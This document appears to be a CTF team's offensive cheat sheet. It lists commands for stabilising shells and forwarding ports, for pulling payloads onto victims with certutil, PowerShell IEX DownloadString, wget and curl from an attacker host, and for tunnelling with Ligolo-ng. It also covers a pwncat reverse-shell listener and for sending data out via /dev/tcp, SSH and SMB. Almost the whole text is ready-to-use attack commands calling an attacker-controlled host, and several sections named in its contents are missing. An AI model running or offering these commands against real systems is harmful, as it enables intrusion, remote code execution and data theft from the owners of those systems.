🄿🅄🅁🄿🄻🄴🅂🅃🄾🅁🄼 🅃🅃🄿🅂

A collection of commands, tools, techniques and procedures of the purplestorm ctf team.

Table of Contents

• Basics
  • Stabilizing Linux shell
  • Port forwarding
  • Transfering files
• Tooling
  • Swaks
  • Ligolo-ng
  • CrackMapExec
• C2
  • Sliver
• Databases
  • SQL Injection
• Payloads
  • Reverse Shell
• Exfiltrating Data

Basics

Stabilizing Linux shell

script /dev/null -c bash
CTRL+Z
stty raw -echo; fg
reset
screen

Port forwarding

SSH:

On kali:

ssh -N -L 80:localhost:80 [email protected] -C

Chisel:

./chisel server -p 8000 --reverse #Server -- Attacker
./chisel client 10.10.16.3:8000 R:100:172.17.0.1:100 #Client -- Victim

Socat:

On victim:

socat tcp-listen:8080,reuseaddr,fork tcp:localhost:9200 &

Netcat:

On victim:

nc -nlvp 8080 -c "nc localhost 1234"

Transfering files

Windows

cmd:

iwr -uri "http://10.10.10.10:8080/shell.exe" -outfile "shell.exe"

wget -O shell.exe 10.10.10.10:8000/shell.exe

certutil -urlcache -f  http://10.10.10.10:8000/shell.exe C:\inetpub\shell.exe

Powershell:

Invoke-WebRequest http://10.10.10.10:8000/shell.exe -OutFile shell.exe

powershell "(new-object System.Net.WebClient).Downloadfile('http://10.10.10.10:8000/shell.exe', 'shell.exe')"

powershell "IEX(New-Object Net.WebClient).DownloadString('http://10.10.10.10:8000/something.ps1')"

via SMB:

sudo python3 /usr/share/doc/python3-impacket/examples/smbserver.py kali .    # On attacker

copy \\10.10.10.10\kali\reverse.exe C:\PrivEsc\reverse.exe    # On target

Linux

wget http://10.10.10.10:8000/some.sh

curl -o some.sh http://10.10.10.10:8000/some.sh

via base64:

cat shell.sh | base64 -w 0   # On attacker
echo <base64encoded> | base64 -d > shell.sh   # On target

via scp:

scp some.sh [email protected]:/tmp/some.sh   # On attacker

Tooling

Swaks

• https://github.com/jetmore/swaks

swaks --server example.com --port 587 --auth-user "[email protected]" --auth-password "password" --to "[email protected]" --from ""user@example.com" --header "Subject: foobar" --body "\\\<LHOST>\x"

Ligolo-ng

• https://github.com/nicocha30/ligolo-ng

Prepare Tunnel Interface

$ sudo ip tuntap add user $(whoami) mode tun ligolo

$ sudo ip link set ligolo up

Setup Proxy on Attacker Machine

$ ./proxy -laddr <LHOST>:443 -selfcert

Setup Agent on Target Machine

$ ./agent -connect <LHOST>:443 -ignore-cert

Configure Session

ligolo-ng » session

[Agent : user@target] » ifconfig

$ sudo ip r add 172.16.1.0/24 dev ligolo

[Agent : user@target] » start

Port Forwarding

[Agent : user@target] » listener_add --addr <RHOST>:<LPORT> --to <LHOST>:<LPORT> --tcp

Payloads

Reverse Shell

• https://github.com/calebstewart/pwncat

pip install pwncat-cs
Listener: pwncat-cs 192.168.1.1 4444
(To change from pwncat shell to local shell, use Ctrl+D)

Exfiltrating Data

Linux

via TCP socket, ebcdic and base64

On kali:

nc -nlvp 80 > datafolder.tmp

On target:

tar zcf - /tmp/datafolder | base64 | dd conv=ebcdic > /dev/tcp/10.10.10.10/80

On kali:

dd conv=ascii if=datafolder.tmp | base64 -d > datafolder.tar
tar xf datafolder.tar

via SSH

On target:

tar zcf - /tmp/datafolder | ssh root@<attacker_ip> "cd /tmp; tar zxpf -"

On kali:

cd /tmp/datafolder

Windows

via SMB server:

sudo python3 /usr/share/doc/python3-impacket/examples/smbserver.py -username user -password pass share . -smb2support  # On kali
net use \\10.10.16.5\share /u:user pass   # On victim
copy C:\Users\user\Desktop\somefile.txt \\10.10.16.5\share\somefile.txt   # On victim

via pscp:

pscp [email protected]:/Users/Administrator/Downloads/something.txt